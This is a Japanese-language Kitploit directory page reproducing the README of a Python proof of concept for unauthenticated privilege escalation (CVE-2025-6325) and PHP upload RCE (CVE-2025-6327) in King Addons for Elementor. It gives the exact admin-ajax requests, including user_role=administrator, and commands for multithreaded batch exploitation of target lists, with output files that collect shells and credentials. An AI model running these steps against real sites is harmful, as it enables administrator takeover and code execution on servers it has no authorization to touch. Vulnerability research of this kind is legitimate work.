Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-6325_CVE-2025-6327 — CVE-2025-6325 の認証不要の権限昇格と CVE-2025-6327 の任意ファイルアップロードによる RCE を、King Addons for Elementor <= 51.1.36 において検証する Python PoC。 | Kitploit
ツール/GitHubGitHub/johenlastgen-jlg/cve-2025-6325_cve-2025-6327
特権昇格脆弱性スキャナー脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストレッドチーミングクローラー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ペイロード開発
GitHubjohenlastgen-jlg/cve-2025-6325_cve-2025-6327

CVE-2025-6325_CVE-2025-6327

CVE-2025-6325 の認証不要の権限昇格と CVE-2025-6327 の任意ファイルアップロードによる RCE を、King Addons for Elementor <= 51.1.36 において検証する Python PoC。

リポジトリを見る
8時間1分前未レビュー

CVE-2025-6325 + CVE-2025-6327

King Addons for Elementor — デュアルエクスプロイトPoC

King Addons for Elementor <= 51.1.36 を対象とした調査・検証ツールであり、2つの文書化された脆弱性を扱います:

  • CVE-2025-6325 — 認証不要の権限昇格
  • CVE-2025-6327 — 認証不要の任意ファイルアップロードによるRCE

認可されたセキュリティテスト、脆弱性研究、および管理されたラボ環境での使用のみを目的としています。


概要

本プロジェクトは、King Addons for Elementor における2つの脆弱性のセキュリティ影響を検証するためのデュアル目的PoCを提供します。

CVE-2025-6325

King Addonsの登録機能を通じた認証不要の権限昇格。

脆弱なフローはクライアント制御の user_role 値を受け入れ、適切なロール許可リストを適用することなくWordPressのユーザー作成処理に渡します。

影響を受けるバージョン: <= 51.1.36 修正済みバージョン: 51.1.37

脆弱な登録フローは以下を使用します:

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=king_addons_user_register
user_role=administrator

PoCはさらに、作成されたアカウントが認証可能かどうか、およびWordPressのユーザー管理ページにアクセスできるかどうかを検証します。

CVE-2025-6327

King Addonsのフォームビルダーアップロード機能を通じた認証不要の任意ファイルアップロード。

脆弱なアップロードハンドラはPHPファイルを誤って受け入れる可能性があり、その結果、Webからアクセス可能なアップロードファイルが生成され、サーバーサイドコード実行につながる可能性があります。

影響を受けるバージョン: <= 51.1.36 修正済みバージョン: 51.1.37

関連するAJAXアクションは以下です:

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=king_addons_upload_file

PoCはアップロードフローを検証し、アップロードされたテストファイルが無害な id コマンドを実行できるかどうかを確認します。


機能

  • デュアル脆弱性検証
  • CVE-2025-6325 権限昇格検証
  • CVE-2025-6327 アップロード/RCE検証
  • パッシブnonce探索モード
  • 単一ターゲットテスト
  • バッチターゲットリスト対応
  • マルチスレッド実行
  • 自動ページクロール
  • サイトマップ探索
  • 設定可能なクローラ深さ
  • 設定可能な最大ページ数
  • 設定可能なHTTPタイムアウト
  • TSV結果出力
  • 検証成功 / loot出力
  • オプションのカラーなしターミナル出力
  • Python標準ライブラリのみ

スクリプトは4つの動作モードをサポートします:

root@kitploit:~
check
privesc
upload
both

これらのモードはコマンドラインインターフェースから直接公開されています。


要件

Python 3が必要です。

サードパーティのPythonパッケージは不要です。

Pythonのバージョンを確認:

root@kitploit:~
python3 --version

使用方法

単一ターゲット

両方の脆弱性チェックを実行:

root@kitploit:~
python3 exploit.py -u http://target.local --exploit both

パッシブチェック

エクスプロイト段階を実行せずに、露出しているKing Addons nonceを探索:

root@kitploit:~
python3 exploit.py -u http://target.local --exploit check

権限昇格検証

root@kitploit:~
python3 exploit.py -u http://target.local --exploit privesc

アップロード/RCE検証

root@kitploit:~
python3 exploit.py -u http://target.local --exploit upload

バッチターゲット

ターゲットファイルを作成:

root@kitploit:~
http://target1.local
https://target2.local
http://target3.local

コメント行と空行は無視されます。

パッシブ評価を実行:

root@kitploit:~
python3 exploit.py -l targets.txt --exploit check

両方の検証段階を実行:

root@kitploit:~
python3 exploit.py -l targets.txt --exploit both -t 20

アップロード検証を実行:

root@kitploit:~
python3 exploit.py -l targets.txt --exploit upload -t 20

権限昇格検証を実行:

root@kitploit:~
python3 exploit.py -l targets.txt --exploit privesc -t 20

クローラオプション

PoCは、2つの脆弱なフローで必要とされるnonceをターゲットページから自動的に探索します。

デフォルトのクローラ設定:

root@kitploit:~
Depth      : 3
Max pages  : 80
Timeout    : 20 seconds
Threads    : 10

これらのデフォルト値はスクリプトのCLI設定で定義されています。

例:

root@kitploit:~
python3 exploit.py \
  -l targets.txt \
  --exploit both \
  -t 20 \
  --depth 3 \
  --max-pages 80 \
  --timeout 20

コマンドラインオプション

スクリプトは構造化結果に results.tsv、検証成功エントリに loot.txt をデフォルトとして使用します。


出力

実行中、ツールはいくつかの状態を報告します。

SHELL

アップロード検証が成功し、テストPHPファイルが検証リクエストに応答したことを示します。

例:

root@kitploit:~
PWNED [SHELL]

PRIV

権限昇格検証が脆弱な登録フローを使用してアカウントを作成したことを示します。

ツールはさらに、そのアカウントがWordPressのユーザー管理ページに対して検証されたかどうかを記録します。

VERIFIED

作成されたアカウントが正常に認証され、WordPressのユーザーページで確認されました。

UNVERIFIED

登録リクエストは成功しましたが、後続の検証ステップで結果のアカウントを確認できませんでした。

CLEAN

検証成功の結果は得られませんでした。

ERR

ターゲットがネットワーク、パース、クロール、またはその他の実行エラーを発生させました。


結果

構造化結果はTSVとして書き込まれます:

root@kitploit:~
results.tsv

出力には以下のフィールドが含まれます:

root@kitploit:~
target
status
shell_url
shell_rce
priv_user
priv_pwd
priv_verified
err

この形式は、結果をスプレッドシートにインポートしたり、さらに処理したりするのに便利です。

検証成功エントリはさらに以下に書き込まれます:

root@kitploit:~
loot.txt

スクリプトはシェル結果と権限検証結果を別々のエントリとして書き込みます。


脆弱性フロー

CVE-2025-6325

root@kitploit:~
Visitor
   │
   ▼
Public King Addons Register Form
   │
   ▼
Nonce discovery
   │
   ▼
king_addons_user_register
   │
   ▼
Client-controlled user_role
   │
   ▼
WordPress user creation
   │
   ▼
Privilege escalation validation

PoCは具体的に以下を登録エンドポイントに送信します:

root@kitploit:~
user_role=administrator

CVE-2025-6327

root@kitploit:~
Visitor
   │
   ▼
King Addons Form Builder
   │
   ▼
Upload nonce discovery
   │
   ▼
king_addons_upload_file
   │
   ▼
PHP test file upload
   │
   ▼
Uploaded file URL
   │
   ▼
Benign execution verification

PoCは一意に生成されたテストファイル名を使用し、返されたアップロードURLを確認します。


ラボ検証

研究実装は以下に対してテストされました:

root@kitploit:~
WordPress 6.8 / 7.1
Elementor 4.2.3
King Addons 51.1.14

研究ノートは、管理されたラボ環境において両方のフローの検証成功を報告しており、権限昇格とシェル実行を含みます。ネガティブコントロールもバージョン 51.1.37 に対してテストされました。


重要なバージョンに関する注意

研究ノートは、51.1.35 および 51.1.36 の一部のWordPress.org ZIPリリースが、その後部分的な修正とともに再タグ付けされたことを示しています。

したがって、脆弱な実装は参照されたSVNタグ 51.1.14 を使用して確認されました。

研究を再現する場合は、51.1.35 または 51.1.36 とラベル付けされたすべてのパッケージが同一の脆弱なコードを含んでいると仮定するのではなく、研究で特定された正確なラボバージョンとパッケージを使用してください。


責任ある使用

本プロジェクトは以下を目的としています:

  • 認可されたペネトレーションテスト
  • 脆弱性研究
  • セキュリティ検証
  • CTF環境
  • ローカルテストラボ
  • 防御的セキュリティ研究

明示的な認可を得たシステムのみをテストしてください。

許可なく本プロジェクトを第三者インフラに対して使用しないでください。

作者は、不正アクセス、永続化、データ窃取、またはシステムの妨害を推奨しません。


免責事項

本ソフトウェアは、セキュリティ研究および認可されたテスト目的で提供されます。

本プロジェクトの使用が適用される法律、規制、契約、および認可要件に準拠していることを確認する責任はあなたにあります。

作者および貢献者は、不正使用、損害、サービス妨害、データ損失、または不正使用から生じるその他の結果について一切の責任を負いません。


作者

JohenLastGen — JLG NETWORK

Research & Security Tooling

Telegram:

@johenlastgen

Channel:

@jlgnetworkredirect


ライセンス

MIT License

完全なライセンス条文については LICENSE を参照してください。

ツールをダウンロード
オプション説明
-u, --url単一のターゲットURLをテスト
-l, --listターゲットURLを含むファイル
-e, --exploitcheck、privesc、upload、both を選択
-t, --threads同時ワーカー数
--depthクローラの最大リンク深さ
--max-pagesターゲットごとにクロールする最大ページ数
--timeoutHTTPリクエストのタイムアウト秒数
-o, --outputTSV結果出力
--loot検証成功の出力
--no-colorターミナルカラーを無効化